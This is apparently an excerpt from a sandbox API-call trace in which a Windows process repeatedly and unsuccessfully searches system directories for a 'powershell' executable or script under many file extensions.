	[0852.764] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0852.764] SetErrorMode (uMode=0x1) returned 0x1
	[0852.764] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0852.774] SetErrorMode (uMode=0x1) returned 0x1
	[0852.776] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0852.776] SetErrorMode (uMode=0x1) returned 0x1
	[0852.776] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0852.784] SetErrorMode (uMode=0x1) returned 0x1
	[0852.788] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0852.788] SetErrorMode (uMode=0x1) returned 0x1
	[0852.788] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0854.423] SetErrorMode (uMode=0x1) returned 0x1
	[0854.424] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0854.425] SetErrorMode (uMode=0x1) returned 0x1
	[0854.425] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0855.707] SetErrorMode (uMode=0x1) returned 0x1
	[0855.709] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0855.709] SetErrorMode (uMode=0x1) returned 0x1
	[0855.709] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0855.717] SetErrorMode (uMode=0x1) returned 0x1
	[0855.718] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0855.719] SetErrorMode (uMode=0x1) returned 0x1
	[0855.719] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0855.727] SetErrorMode (uMode=0x1) returned 0x1
	[0855.728] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0855.728] SetErrorMode (uMode=0x1) returned 0x1
	[0855.729] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0855.737] SetErrorMode (uMode=0x1) returned 0x1
	[0855.738] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0855.738] SetErrorMode (uMode=0x1) returned 0x1
	[0855.738] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.322] SetErrorMode (uMode=0x1) returned 0x1
	[0857.323] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0857.323] SetErrorMode (uMode=0x1) returned 0x1
	[0857.323] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.335] SetErrorMode (uMode=0x1) returned 0x1
	[0857.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.336] SetErrorMode (uMode=0x1) returned 0x1
	[0857.336] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.337] SetErrorMode (uMode=0x1) returned 0x1
	[0857.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.337] SetErrorMode (uMode=0x1) returned 0x1
	[0857.337] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.337] SetErrorMode (uMode=0x1) returned 0x1
	[0857.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.338] SetErrorMode (uMode=0x1) returned 0x1
	[0857.338] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.338] SetErrorMode (uMode=0x1) returned 0x1
	[0857.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.338] SetErrorMode (uMode=0x1) returned 0x1
	[0857.338] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.339] SetErrorMode (uMode=0x1) returned 0x1
	[0857.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.339] SetErrorMode (uMode=0x1) returned 0x1
	[0857.339] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.339] SetErrorMode (uMode=0x1) returned 0x1
	[0857.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.340] SetErrorMode (uMode=0x1) returned 0x1
	[0857.340] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.340] SetErrorMode (uMode=0x1) returned 0x1
	[0857.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.342] SetErrorMode (uMode=0x1) returned 0x1
	[0857.342] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.342] SetErrorMode (uMode=0x1) returned 0x1
	[0857.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.342] SetErrorMode (uMode=0x1) returned 0x1
	[0857.342] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.343] SetErrorMode (uMode=0x1) returned 0x1
	[0857.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.343] SetErrorMode (uMode=0x1) returned 0x1
	[0857.343] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.343] SetErrorMode (uMode=0x1) returned 0x1
	[0857.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.344] SetErrorMode (uMode=0x1) returned 0x1
	[0857.344] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.344] SetErrorMode (uMode=0x1) returned 0x1
	[0857.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.344] SetErrorMode (uMode=0x1) returned 0x1
	[0857.345] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.345] SetErrorMode (uMode=0x1) returned 0x1
	[0857.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.345] SetErrorMode (uMode=0x1) returned 0x1
	[0857.345] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.345] SetErrorMode (uMode=0x1) returned 0x1
	[0857.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.346] SetErrorMode (uMode=0x1) returned 0x1
	[0857.346] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.346] SetErrorMode (uMode=0x1) returned 0x1
	[0857.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.346] SetErrorMode (uMode=0x1) returned 0x1
	[0857.347] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.347] SetErrorMode (uMode=0x1) returned 0x1
	[0857.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0857.347] SetErrorMode (uMode=0x1) returned 0x1
	[0857.347] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.347] SetErrorMode (uMode=0x1) returned 0x1
	[0857.348] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.333] SetErrorMode (uMode=0x1) returned 0x1
	[0858.333] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.333] SetErrorMode (uMode=0x1) returned 0x1
	[0858.333] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.334] SetErrorMode (uMode=0x1) returned 0x1
	[0858.334] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.334] SetErrorMode (uMode=0x1) returned 0x1
	[0858.334] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.334] SetErrorMode (uMode=0x1) returned 0x1
	[0858.334] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.335] SetErrorMode (uMode=0x1) returned 0x1
	[0858.335] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.335] SetErrorMode (uMode=0x1) returned 0x1
	[0858.335] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.335] SetErrorMode (uMode=0x1) returned 0x1
	[0858.335] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.336] SetErrorMode (uMode=0x1) returned 0x1
	[0858.336] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0858.336] SetErrorMode (uMode=0x1) returned 0x1
	[0858.336] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0858.336] SetErrorMode (uMode=0x1) returned 0x1
